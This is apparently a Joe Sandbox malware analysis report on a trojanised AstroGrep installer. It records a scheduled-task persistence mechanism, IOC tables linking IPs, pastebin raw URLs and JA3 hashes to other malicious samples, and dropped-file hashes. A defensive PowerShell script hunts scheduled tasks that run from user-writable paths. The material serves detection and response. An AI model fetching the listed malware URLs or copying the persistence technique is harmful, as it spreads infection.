                                                                                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 450276
Start date: 17.07.2021
Start time: 22:36:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 53s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ms.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal52.troj.evad.winEXE@19/26@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 13.8% (good quality ratio 11.6%)
• Quality average: 70%
• Quality standard deviation: 37.1%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 86
• Number of non-executed functions: 31
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 23.211.6.115, 20.82.210.154, 23.35.236.56, 40.112.88.60, 20.82.209.183, 80.67.82.235, 80.67.82.211, 20.50.102.62
• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

Time | Type | Description
22:37:25 | Task Scheduler | Run new task: astro-grep path: "C:\Users\user\AppData\Roaming\astro-grep.exe"
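The task recorded above (name astro-grep, action C:\Users\user\AppData\Roaming\astro-grep.exe, registered about a minute into the run) is the sample's persistence mechanism. The PowerShell below is an added triage check, not part of the Joe Sandbox report and not code from the sample: it enumerates every scheduled task whose action or argument list points into a user-writable location, and reports who the task runs as, whether the binary is Authenticode-signed and its SHA-256, so a hit can be compared against the hashes in the Dropped Files table. The path pattern, the `-AllowTaskName` parameter and the output file names are assumptions made for this example.

```powershell
# Added triage check, not code from the Joe Sandbox report or the sample.
# Requires the ScheduledTasks module (Windows 8 / Server 2012 and later);
# run elevated so tasks registered by other users are visible.

# Locations a normal installer does not use for a persistent task. Assumption for
# this example; tune it for your estate (some per-user updaters live in AppData\Local).
$SuspiciousPathPattern = '(?i)\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Windows\\Temp\\|\\Users\\Public\\'

function Get-SuspiciousScheduledTask {
    [CmdletBinding()]
    param(
        # Task names already vetted and to be skipped. Hypothetical parameter for this example.
        [string[]]$AllowTaskName = @()
    )

    foreach ($task in Get-ScheduledTask) {
        if ($AllowTaskName -contains $task.TaskName) { continue }

        foreach ($action in $task.Actions) {
            # Only Exec actions carry a command line; COM-handler and e-mail actions do not.
            if (-not $action.Execute) { continue }

            # Expand %APPDATA%-style variables and strip quotes so the regex sees the real path.
            $exe       = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            $arguments = [Environment]::ExpandEnvironmentVariables([string]$action.Arguments)

            # Match on the executable and on the arguments, so a launcher such as
            # wscript.exe or rundll32.exe pointing at a payload in AppData is caught too.
            if ("$exe $arguments" -notmatch $SuspiciousPathPattern) { continue }

            $info = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath
            if (Test-Path -LiteralPath $exe -PathType Leaf) {
                $sig  = (Get-AuthenticodeSignature -FilePath $exe).Status
                $hash = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
            } else {
                $sig  = 'FileMissing'   # binary deleted, or a bare name resolved via PATH
                $hash = $null
            }

            [pscustomobject]@{
                TaskName    = $task.TaskName
                TaskPath    = $task.TaskPath
                State       = $task.State
                Author      = $task.Author
                RunAs       = $task.Principal.UserId
                Execute     = $exe
                Arguments   = $arguments
                Signature   = $sig
                SHA256      = $hash
                LastRunTime = $info.LastRunTime
                NextRunTime = $info.NextRunTime
            }
        }
    }
}

# Usage: list the hits, then keep the full definition XML of each one for the case file.
$hits = Get-SuspiciousScheduledTask
$hits | Format-Table TaskName, RunAs, Execute, Signature, LastRunTime -AutoSize

foreach ($h in $hits) {
    $safeName = $h.TaskName -replace '[\\/:*?"<>|]', '_'
    Export-ScheduledTask -TaskName $h.TaskName -TaskPath $h.TaskPath |
        Out-File -LiteralPath (Join-Path $env:TEMP "task_$safeName.xml")
}
```

The exported XML carries the trigger (logon, boot, fixed interval) and the author, neither of which Get-ScheduledTask shows in its default view; for a sample like this one, that trigger is what decides whether killing the process is enough or the task must be deleted first.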

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
185.195.232.251 | astro-grep-setup.exe.doc | malicious |
185.195.232.251 | SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe | malicious |
104.23.98.190 | C1jT7pIYSJ.exe | malicious | pastebin.com/raw/npsqXhuQ
104.23.98.190 | uwoYazbVds.exe | malicious | pastebin.com/raw/npsqXhuQ
104.23.98.190 | u6Wf8vCDUv.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.98.190 | EU441789083.doc | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.98.190 | b095b966805abb7df4ffddf183def880.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | E1Q0TjeN32.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | 6YCl3ATKJw.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | Hjnb15Nuc3.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | JDgYMW0LHW.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | 4av8Sn32by.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | 5T4Ykc0VSK.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | afvhKak0Ir.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | T6OcyQsUsY.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | 1KITgJnGbI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | PxwWcmbMC5.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | XnAJZR4NcN.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | PbTwrajNMX.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | 22NO7gVJ7r.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | rE7DwszvrX.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.98.190 | VjPHSJkwr6.exe | malicious | pastebin.com/raw/XMKKNkb0

                                                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
pastebin.com | astro-grep-setup.exe.doc | malicious | 104.23.98.190
pastebin.com | TIJYYlYJpv.exe | malicious | 104.23.99.190
pastebin.com | banload.msi | malicious | 104.23.99.190
pastebin.com | SecuriteInfo.com.Trojan.PackedNET.721.17987.exe | malicious | 104.23.98.190
pastebin.com | 6rg5Enu1ks.exe | malicious | 104.23.99.190
pastebin.com | Loader.exe | malicious | 104.23.99.190
pastebin.com | banload.msi | malicious | 104.23.98.190
pastebin.com | t3uss3bjUL.exe | malicious | 104.23.98.190
pastebin.com | h3Y0CRAJyq.exe | malicious | 104.23.98.190
pastebin.com | Order Request.xlsx | malicious | 104.23.98.190
pastebin.com | 4fy0Wb1EUX.exe | malicious | 104.23.98.190
pastebin.com | CYzY9Pi2ny.exe | malicious | 104.23.99.190
pastebin.com | SgCDxPdEul.exe | malicious | 104.23.99.190
pastebin.com | 42C75D53ACD263FF2B2DAD511E40E0E40E9A6119BAA68.exe | malicious | 104.23.99.190
pastebin.com | Request For Quotation.xlsx | malicious | 104.23.98.190
pastebin.com | Lr2Hm9rVac.exe | malicious | 104.23.98.190
pastebin.com | XoN2GgRiga.exe | malicious | 104.23.99.190
pastebin.com | vEJ2Mfxn6p.exe | malicious | 104.23.99.190
pastebin.com | G-DECL G50 EURL.xlsx | malicious | 104.23.99.190
pastebin.com | C1jT7pIYSJ.exe | malicious | 104.23.98.190

ASN

Match            Sample Name / URL                                   Detection  Context
CLOUDFLARENETUS  astro-grep-setup.exe.doc                            malicious  104.23.98.190
CLOUDFLARENETUS  glupteba.exe                                        malicious  104.21.63.250
CLOUDFLARENETUS  E2QIvDXi7H.exe                                      malicious  104.21.83.89
CLOUDFLARENETUS  JHECEQl1ML.exe                                      malicious  172.67.220.44
CLOUDFLARENETUS  UwvHsxxITi.exe                                      malicious  104.21.19.209
CLOUDFLARENETUS  gVI2IrBzjJ.exe                                      malicious  172.67.201.250
CLOUDFLARENETUS  y54fD0dMcF.exe                                      malicious  104.21.87.184
CLOUDFLARENETUS  WR0MTpWkYC.exe                                      malicious  172.67.193.180
CLOUDFLARENETUS  LPY15536W4.exe                                      malicious  104.21.84.71
CLOUDFLARENETUS  SecuriteInfo.com.Trojan.Inject4.14369.15008.exe     malicious  162.159.134.233
CLOUDFLARENETUS  TIJYYlYJpv.exe                                      malicious  162.159.138.232
CLOUDFLARENETUS  7vLHRD4IdanbLrE.exe                                 malicious  104.21.19.200
CLOUDFLARENETUS  PTELOONB39-67.exe                                   malicious  172.67.215.158
CLOUDFLARENETUS  o2fAkrQ43w.exe                                      malicious  104.21.51.99
CLOUDFLARENETUS  ATT62725.HTM                                        malicious  104.18.11.207
CLOUDFLARENETUS  WAdStf9Llw.exe                                      malicious  104.21.51.99
CLOUDFLARENETUS  P.O 16.exe                                          malicious  104.21.19.200
CLOUDFLARENETUS  F6w8Ll8iWU.exe                                      malicious  162.159.133.233
CLOUDFLARENETUS  PCgYjH5fEn.exe                                      malicious  104.21.19.209
CLOUDFLARENETUS  another.dll                                         malicious  104.20.185.68
ESAB-ASSE        astro-grep-setup.exe.doc                            malicious  185.195.232.251
ESAB-ASSE        TIJYYlYJpv.exe                                      malicious  185.65.135.248
ESAB-ASSE        NotificationApplicationspdf.exe                     malicious  141.98.255.146
ESAB-ASSE        SgCDxPdEul.exe                                      malicious  185.65.135.248
ESAB-ASSE        5icstaf5i1.exe                                      malicious  45.83.220.209
ESAB-ASSE        aY5UWK4jxg.exe                                      malicious  45.83.220.209
ESAB-ASSE        ewlD3Dwdxy.exe                                      malicious  185.65.134.182
ESAB-ASSE        byodInstCL.exe                                      malicious  193.32.127.38
ESAB-ASSE        SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe   malicious  185.195.232.251
ESAB-ASSE        PD0ssyK178.exe                                      malicious  185.65.134.173
ESAB-ASSE        EpVgl7WUGD.exe                                      malicious  185.65.134.173
ESAB-ASSE        tgv7RXFab7.exe                                      malicious  185.65.134.173
ESAB-ASSE        7niXcdi1SU.exe                                      malicious  185.65.134.173
ESAB-ASSE        9gee3iCc4N.exe                                      malicious  185.65.134.173
ESAB-ASSE        l3eFnAYO6a.exe                                      malicious  185.65.134.173
ESAB-ASSE        X97zFKQz4Q.exe                                      malicious  185.65.134.173
ESAB-ASSE        jf1w8rsogr.exe                                      malicious  185.65.134.173
ESAB-ASSE        s1G5ZwG3Yb.exe                                      malicious  185.65.134.173
ESAB-ASSE        3ZhSP5SXgW.exe                                      malicious  185.65.134.173
ESAB-ASSE        wvS1iVG3MK.exe                                      malicious  185.65.134.173

JA3 Fingerprints

Match                             Sample Name / URL                                   Detection  Context
54328bd36c14bd82ddaa0c04b25ed9ad  y54fD0dMcF.exe                                      malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  SO-19844 EIDCO.ppam                                 malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  TIJYYlYJpv.exe                                      malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  7vLHRD4IdanbLrE.exe                                 malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  IdDetails.ppam                                      malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  P.O 16.exe                                          malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  F6w8Ll8iWU.exe                                      malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  Sirus.exe                                           malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  New Purchase Order-030220.ppt                       malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  ReGQ1vAQp9.exe                                      malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  DHL_119040 Beleg.ppt                                malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  order 0721 Review .doc.exe                          malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  6rg5Enu1ks.exe                                      malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  RFQ REF R2100131410 pdf.exe                         malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  samples.exe                                         malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  265.exe                                             malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  Loader.exe                                          malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  Supwaize2.exe                                       malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  download.dat.exe                                    malicious  104.23.98.190
54328bd36c14bd82ddaa0c04b25ed9ad  WindowsFormsApp1.exe                                malicious  104.23.98.190

Dropped Files

Match                                                          Sample Name / URL         Detection
C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll    astro-grep-setup.exe.doc  malicious
C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll          astro-grep-setup.exe.doc  malicious
C:\Program Files (x86)\AstroGrep\NLog.dll                      astro-grep-setup.exe.doc  malicious
C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe    astro-grep-setup.exe.doc  malicious
C:\Program Files (x86)\AstroGrep\AstroGrep.exe                 astro-grep-setup.exe.doc  malicious

                                                                                                          Created / dropped Files

                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):4.487949196682819
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:+2x9scF3MzO5l+9B9Q6uyT4A3KXr7HazHJ/ylHj/V3ojWNta1FYcCe:5x938OYLsA3YgwN5RszYcCe
                                                                                                          MD5:A06B34EE8AD3B52CE1C76847FC7991A0
                                                                                                          SHA1:D52CBED52AD91E5D297E3F96D7AAA1476A42F087
                                                                                                          SHA-256:0822F460D448356DAE96963C1A56DA2553FE6BB6A859B1646D1A76DBC346F03C
                                                                                                          SHA-512:B4741046E83A89FBFB8848AC649E22D1773B54F5B6C96EE49057C12ADE502DE5594C706BAE140FEF864F3FB1A585A0F8D840C5369073561189C9665CD5FD2CD2
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Reputation:low
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.\.............................-... ...@....@.. ....................................@..................................,..S....@..P....................`.......+............................................... ............... ..H............text...4.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................-......H........"...............................................................0..T.........i.1M..i.0G..~.....r...p......(....&...r)..pr-..po........r)..pr-..po........(....*.0..........~....r/..p.o.....~....rO..p.o.....~....r...p.o......9q....9k....9e....99....r...po......r...po.......r...po.......93.....9,.....9%....r-..p.r...p(....o......r-..p.r...p(....o......r-..p.r...p(....o.....r...pr...p.(....o......r...pr...p.(....o......r...pr...p.(....o.....r...po........r...po........r.
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe.config
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):175
                                                                                                          Entropy (8bit):5.022488547778473
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vFWWMNHU8LdgCQcIMOoT02VK/FlURAmIRMNHjFHr0lUfEyhTRRAoe+RAW4QIMOov:TMVBd1I002VKNa7VJdfEyFRRAoeuAW44
                                                                                                          MD5:57717DA46BD278CA043D8101847D8FF4
                                                                                                          SHA1:D93BAADBB3C644D841D7AA4E95DCD76F9897BD05
                                                                                                          SHA-256:12D08F2857A02B5A4EF5DF6EC2D840296AAC4C219704B2FB6F15A7571230A4C5
                                                                                                          SHA-512:A054A7FD69E4A643286212FEDABDE4BDFB36BBF3E7F9FC33524BA8DFECBC375E991C23B4E047F5F235A77E9D6A525F996934A4A993B61E1FE7D84066FF972DF1
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>...</startup>..</configuration>..
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9216
                                                                                                          Entropy (8bit):4.660156886149009
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:MPL93AfzEbqrlLH945OKtueaQJ6BLcSEeC137:MsEbyHGscu3DdkxL
                                                                                                          MD5:2F2899673ABB136BFC8B92A6D3BAFF33
                                                                                                          SHA1:5BE14D5C58AF9F78858DD5E9ED6CD929F87AC0B4
                                                                                                          SHA-256:0E7A71232FB6676777A823ADDB4776BD895ABBE29EA2487110073BD0C5FF6AA6
                                                                                                          SHA-512:CF5B23F4E5417DDC4AB5A354E7EA90C5CCE28133DE7D1AE260F0879E474727DBB73E47C9CB92A98BD5B6F6EBCFC67CD955423FA1615A0D7C24783415325200CA
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\...........!.................9... ...@....... ....................................@..................................9..K....@.......................`......H8............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......@$...............................................................(....,.(....o....(....*..(....~....(....*...0..........(....r...p(.........(....r...p(.........~....~....r...p(....(.........~....~....r...p(....(.........(....o....(.........(....o....(.........*..(....*..{....*"..}....*..{....*"..}....*^~....-.s.........~....*..0...........(....s.....s......r1..p.o.....~....}......{....(....o.....~....(....o.....r;..p(....o .... ..P.jo!.....o".....o#...r...p~$....s%...
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.exe
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):573440
                                                                                                          Entropy (8bit):6.183835631467389
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:uibf6/zxXrXyhwSl9LndCXlhqNWvgVYODH9zG5X1LeihaBQSa:ifEWOYODH9zoX1Le/
                                                                                                          MD5:202C965DE1291E773F7DAE0C495253FB
                                                                                                          SHA1:13EB40E5DF525388D7A2AD18B1720FED78C5EE13
                                                                                                          SHA-256:3138155ABD6A9BADDB63869CD34BF0492718929E910CB4F38BC1767507932B4F
                                                                                                          SHA-512:97445E848DA86876AB324B9C6EC2D27F51BE753ABF1956A79829763F92363B9B7C05A232F876C97A66653109505BAE94BB2B85B53E6F9697698EF8EA2FD21F7A
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 2%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\.................0...........E... ...`....... ....................................@..................................E..W....`...i........................................................................... ............... ..H............text....&... ...0.................. ..`.rsrc....i...`...p...@..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Program Files (x86)\AstroGrep\AstroGrep.exe.config
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):237
Entropy (8bit):4.960108368394514
Encrypted:false
SSDEEP:6:TMV0kIffVKNC7VJdfEyFRRAopuAlKNjSt+gP9XWRM5W4QIT:TMG13VOcr6U9wNutJP9UMo4xT
MD5:502C63E84CACC88FA782EEC1772EFF68
SHA1:BA6138741633C60D1C92C7C25DDE15D378C0C324
SHA-256:FE3405C9535DCE3857908E6740099227B7D55CF78A15676D440E781E04EA17BD
SHA-512:EBA2DD5216BB3293BB3101A5CDADDEF0B4A94577159A8A0654F712F9939F1D03FF670DA6DF0B5F4475D593EDDF330E76E2F6EB19B19E3E51C2EA53A74ACC59B3
Malicious:false
Preview: <?xml version="1.0"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>.. </startup>.... <runtime>.. <gcAllowVeryLargeObjects enabled="true" />.. </runtime>..</configuration>
C:\Program Files (x86)\AstroGrep\AstroGrep_256x256.png
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):6813
Entropy (8bit):7.898680227457462
Encrypted:false
SSDEEP:192:djkp/iNmEYXGtZEV2QWEgFmPPqlqCSKG1Ief:hmiNmTP733q+XR
MD5:2143826EABE773D3206333B65C2FC67B
SHA1:B75806940C971C2BB8584E1028EFA512F8AA5646
SHA-256:8A50671F22D64A0131C9FFE23B3777862172F6D5C63B48C94DFE0FE8E8D62D06
SHA-512:3D0611BEE13D6A397D5FB3F2E924829360596891DBCFDE1EC0FCE25F2DDEE62D50A10ABA31827334FE12867C508694BB8FB3F72604FC08A1CD323C2615C2F3FF
Malicious:false
C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):626688
Entropy (8bit):6.014937851800105
Encrypted:false
SSDEEP:6144:Oo7n6u1n5vp9yRUmqtM0yRrl0pjoeUy8b01vKbZ/gAGl0gUEdYC:OoLDnwmW0yRr88bwKKdf
MD5:B4D5D46E50006E87B30E7D514E95173C
SHA1:BD3BA298EB7E4CDBFDF29E3992BE7D32A4E792EB
SHA-256:058F38F33F3F99F904AB9588447A234346C859718404B4E8A523673ED19CDBE7
SHA-512:38FF7CADA6CFA56AF812A1D859AAC4FB8B94DF50454A9FECC55E4FDB159339F6BA885D0B57FE8C522227DD9280CDA0CA21C6A073B6552923FA33F6E77D8F3BC5
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: astro-grep-setup.exe.doc, Detection: malicious
C:\Program Files (x86)\AstroGrep\NLog.dll
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):784384
Entropy (8bit):6.017097344038701
Encrypted:false
SSDEEP:12288:/n77J/zrlPjThZdvTU585ZqmjlJzAF7GVj8TcpkMcaQD3SaB5mUsQ:/n77J/zrlPjThZdv55ZbIF7GVje4kRD5
MD5:063D7646038B3676CA4BBCCF8CD9736C
SHA1:DE90082E366938A3D1BB16A9B5BBB4D692F620D4
SHA-256:F809128B8E35F20A0407F9642AEFA1A64D2B5494F024F5EC403B712C67441ECD
SHA-512:BB50F12A9B5DE65752B7AFDDF82726A82BB06DF8B6B16712385663981DA810189FA9B72FA45122B3C57719D9EB626BB5D1D90B29D833851A4AA08E35B6FDB923
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: astro-grep-setup.exe.doc, Detection: malicious
C:\Program Files (x86)\AstroGrep\Uninstall.exe
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):61854
Entropy (8bit):6.589895956298641
Encrypted:false
SSDEEP:1536:Gw4fpS/nScizHM74N0DIDidcfgdLeAyN9jWtNixGl:Gw4gnScG4DI2dcfceAkWrixq
MD5:15BDDE25A8A23AAFB0E593D4A1F145B6
SHA1:250EC8FEA74A2EAC9A1BD3DA1ABF5AC91D1962D7
SHA-256:4118177FBD02533C449D3D02168300DA1D5B24052B10877A3B4BC03E27C5C375
SHA-512:3AFB05064722B5616EA74BC8C8E6C50D6EB8F1125AC333339430D05FAE89E445753E45DD5FDCA17E9BE9A94BCA67B3E2B31EEB52DAF2AF3BEC47D0A1EC1ABD03
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 5%
• Antivirus: ReversingLabs, Detection: 2%
C:\Program Files (x86)\AstroGrep\astrogrep.VisualElementsManifest.xml
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):303
Entropy (8bit):5.268121017723893
Encrypted:false
SSDEEP:6:ejHyWc4subuVFWod/NDhkQwYnF4kQwYWadTZ/FhYWadTZ/FeXXKhdNc0SDSFQ:ebvyWW/meZsR1sR8drDGQ
MD5:824E6132D30D647AED6E9EE3C2DA12C9
SHA1:DCBE8CAB6784AA26BC9A4F0DC5B60D9733A49F74
SHA-256:01BF1A694FAF44953B592D1C237D3F93C1B8B346476C30E638C1FAAD0201386B
SHA-512:DABC61D48723B53C95EE7BBDDB92261E724054CDCE4F9616B0338CACE8F8A9667CAC087C131D8A83BEE68875436F08F9A313F70EA5B85A46989D2B21C84F0541
Malicious:false
Preview: <Application xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>.. <VisualElements.. ShowNameOnSquare150x150Logo='on'.. Square150x150Logo='AstroGrep_256x256.png'.. Square70x70Logo='AstroGrep_256x256.png'.. ForegroundText='light'.. BackgroundColor='#fb7f06'/>..</Application>
C:\Program Files (x86)\AstroGrep\libAstroGrep.dll
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):237568
Entropy (8bit):5.286872988422086
Encrypted:false
SSDEEP:3072:1QwCS0adLYzS+L5VsbeNcg2IZOz3eJJ9oA3fGu51O+q4gbPaYgVXLRn/qR8H6K69:1QwCAdLy/mucxIUKPOufGu5m4fr
MD5:6E3AFEF0BD6B7EC03007CCDD76F85447
SHA1:8B434EAB09D948FAC57E98F312C8B24381873374
SHA-256:B268CDA0D5F431E0CB86FFF8A39420AC03DFC9C498CAE702F859904B79307EDE
SHA-512:E10EC66C764584AD80D47C1B0CF64B61EBBE3B4E72D2CA05BCDAB5B62F4E3F6FE17A1C37EED9D87A678B8C3D42E6534DE9EE95BF204CA815426EA28935633894
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Program Files (x86)\AstroGrep\license.txt
